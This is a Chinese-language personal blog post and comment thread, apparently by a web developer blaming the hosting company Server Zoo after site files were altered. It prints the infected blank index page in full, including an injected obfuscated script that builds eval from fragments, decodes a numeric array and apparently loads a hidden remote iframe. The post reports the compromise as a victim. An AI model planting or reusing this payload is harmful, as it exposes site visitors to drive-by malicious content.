實在有夠靠杯,今天早上一進公司,就發通知,我的網站不能用(其實是昨天晚上公司同事就發信給我了,只是他發信給我,已經是半夜,我已經在睡了)。
這幾天,我都只有在我自己的電腦上改程式,因為改版的動作蠻大的,所以我沒有上傳新檔。
結果我發現昨天晚上8點多,就有人變動了這些檔案,這些檔案,我都超過1個月沒有動過,會出這個訊息我也很好奇。
把不能執行且被修改過的檔案下載回來備份,我再把檔案打開一看,裡面的東西,根本就是亂七八糟,不是我寫的程式(不是我加密編碼過的結果)。
靠爸,Server Zoo被駭了。
為什麼這麼說咧,我另一套一模一樣的程式碼(其實是2套,一套在Server Zoo美國主機,另一套在FrogHost,程式99.99%一樣,只是圖不同),丟在美國的主機上,完全沒有問題,也沒有被駭,而且我在程式設計的時候,就把溢位攻擊的防護和sql injection的攻擊給擋了,另外編碼漏洞的攻擊,我也都全擋了。
而且我的程式還加密編碼過,別人拿不到Source Code,只有我有原碼會出問題,最後原因,指向Server Zoo上的系統漏洞。駭客或是機器人硬改編碼過的程式,導致程式不能執行。
後來回想起來,每次小改版,我會測過,再發Release,結果還是三不五時出現錯誤,現在仔細回想,弄不好早就被駭了,只是程式我都Over Write掉,沒有留下來,結果不留還好,一留就發現駭。
有人可能會問,是不是我自己程式寫的不好,程式露洞導致被駭,基本上我連visitor都有session control了,加上防護攻擊的涵式、function都是網路上前輩的智慧,加上我修改後已在別的站實戰過了(日流量超過2000人的站),程式防護要出錯的機會不是沒有,只是很低很低。
好啦!反正Server Zoo一貫的回應,就是叫我改密碼。
這時,我為什麼說一貫的回應呢?
因為上星期,我幫客戶的程式改版,明明在半夜一個檔案一個檔案改檔名(備份),再傳新的上去,結果快要中午跟我講,程式不能執行,結果FTP一看,檔案全都不見了,實在太扯,另外我經手的30個網站,每個都是安全的,正常的,沒有問題(只差在不是放在Server Zoo)。
這樣怎麼叫我不懷疑是Server Zoo的問題。
index.htm index.html 兩個檔案本來就是完全空白的頁面,不是後台的進入點,結果被加了一堆東西。看來這個陷阱真的有呆呆跑進去動手腳。紅色的部份,就是被增加動手腳的地方。怪的是,我連php檔名都取的很特殊了,還能被改到,直指Server被駭,list出我所有的檔案。
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<title>Blank Page</title>
</head><body><!–c54471–><script>d=Date;d=new d();h=-parseInt(‘012′)/5;if(window.document)try{new document.getElementById(“qwe”).prototype}catch(qqq){st=String;zz=’al’;zz=’v’+zz;ss=””;if(1){f=’f’+’r’+’o’+’m’+’Ch’+’ar’;f=f+’C’+’od’+’e’;}e=this[f.substr(11)+zz];t=’y’;}n=”3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~19.5~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49.5~19~16~29~51.5~50~56~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.5~50~56~49.5~56.5~51~57~49~56.5~22~51.5~54~22.5~51.5~54~22~48.5~50.5~51.5~30.5~27.5~18.5~15~58.5~51.5~49~57~51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~18.5~15~56.5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~28~51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16~19.5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~54~15~51.5~50~56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~47.5~53.5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~22.5~50~56~49.5~56.5~51~57~49~56.5~22~51.5~54~22.5~51.5~54~22~48.5~50.5~51.5~30.5~27.5~18.5~19.5~28.5~50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~50~57~29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~29.5~18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~51.5~50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~50~19.5~28.5~5.5~3.5~3.5~61.5″.split(“a~”.substr(1));for(i=0;i!=563;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(“”+q);</script><!–/c54471–>
</body>
</html>
隨機文章
- 關於Google的不為惡政策[Don’t be evil] (2012-01-13)
- 真的被Citibank和中華電信打敗 (2010-12-29)
- 受保護的內容: PTT 養帳號,注意事項 (2017-03-04)
- 20190914 PTT帳號暫停註策 (2018-09-18)
- 山水牌(SANSUI)音響HD-878開箱實測 (2011-06-11)
唉…我也是在ServerZoo租用空間,&& 資料庫昨天有資料消失了,我無法確認是自己手誤刪除,還是….(手動刪除真的機會很小,自己的刪除習慣來說),重點是,ServerZoo的服務態度令人不敢苟同,回信中說當晚會協助還原,結果忘了,隔天打電話詢問,說是立刻處理(這邊很明顯讓人發現是忘了吧…XD),復原完,很好,資料庫跟沒還原前一毛一樣,再度打電話過去問,說是早上跑了備份檔,所以資料被覆蓋,真的很OOXX,不是早通知要還原,忘了作還原然後擺爛,ServerZoo”唯一的技術人員”的回應就是擺爛…..你耐他何。
他們備份只有一次
昨天沒有回原
今天早上又備
就把備份的資料蓋掉了..
所以…我們家的人要求我每天dump資料庫
他在FTP回來..
至於serverzoo哦…不如我放在國外
線上直接溝通..馬上復原..馬上測試
哈…考慮搬出去吧..
老實說…我有想過這件事
不巧的是…我反應被駭之後
四個小時,我的管理界面大改
應該是主機的版本升級了…
被駭的可能性大增…..
我會建議你搬走…
如果相同事件在遇到幾次~不僅僅自己的repustation會受影響
每次要recovery也是滿浪費自己的時間的XD
我把密碼換掉,再開專用帳號
所有的ftp都是用獨立的專用帳號
哪個帳號流出去的,配合log
就抓的到..